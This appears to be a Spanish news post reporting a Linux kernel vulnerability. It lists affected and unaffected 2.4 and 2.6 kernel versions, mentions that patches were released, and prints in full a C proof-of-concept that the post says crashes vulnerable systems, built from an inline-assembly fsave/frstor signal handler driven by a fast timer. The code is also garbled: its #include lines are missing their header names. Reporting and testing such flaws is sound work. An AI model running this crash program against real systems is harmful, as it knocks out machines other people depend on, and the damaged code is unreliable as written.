Nueva vulnerabilidad en el núcleo de Linux

e ha comprobado que las siguientes versiones resultan vulnerables, aunque posiblemente lo sean muchas más:

* Linux 2.6.x

2.6.7-rc2
2.6.6 (vanilla)
2.6.6-rc1 SMP (varified by blaise)
2.6.6 SMP (verified by riven)
2.6.5-gentoo (verified by RatiX)
2.6.5-mm6 - (verified by Mariux)
2.6.5 (fedora core 2 vanilla)
2.6.3-13mdk (Mandrake)

* Linux 2.4.2x

2.4.26 vanilla
2.4.26, grsecurity 2.0 config
2.4.26-rc1 vanilla
2.4.26-gentoo-r1
2.4.22
2.4.22-1.2188 Fedora FC1 Kernel
2.4.20 RH7.3 (gcc 2.96)
2.4.18-bf2.4 (debian woody vanilla)

Las siguientes versiones resultan inmunes, aunque se desconoce la razón por el momento:

* Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
* Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
* Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
* Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
* Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
* 2.2.19-kernel

El programa para comprobar la vulnerabilidad:

#include

#include

#include

static void Handler(int ignore)

{

char fpubuf[108];

__asm__ __volatile__ ("fsave %0 " : : "m"(fpubuf));

write(2, "*", 1);

__asm__ __volatile__ ("frstor %0 " : : "m"(fpubuf));

}

int main(int argc, char *argv[])

{
struct itimerval spec;

signal(SIGALRM, Handler);

spec.it_interval.tv_sec=0;

spec.it_interval.tv_usec=100;

spec.it_value.tv_sec=0;

spec.it_value.tv_usec=100;

setitimer(ITIMER_REAL, &spec, NULL);

while(1)

write(1, ".", 1);

return 0;

}

Más información en Linux Reviews.

Tal y como comenta News.com, los usuarios de Linux se han dado mucha prisa en corregir esa vulnerabilidad en el núcleo de linux. De hecho, durante el día de ayer fueron publicados sendos parches para guardarse de la actuación del exploit que colapsa los sistemas.

El parche para el kernel 2.4.x puede descargarse desde aquí y para el Kernel 2.6.x, aquí.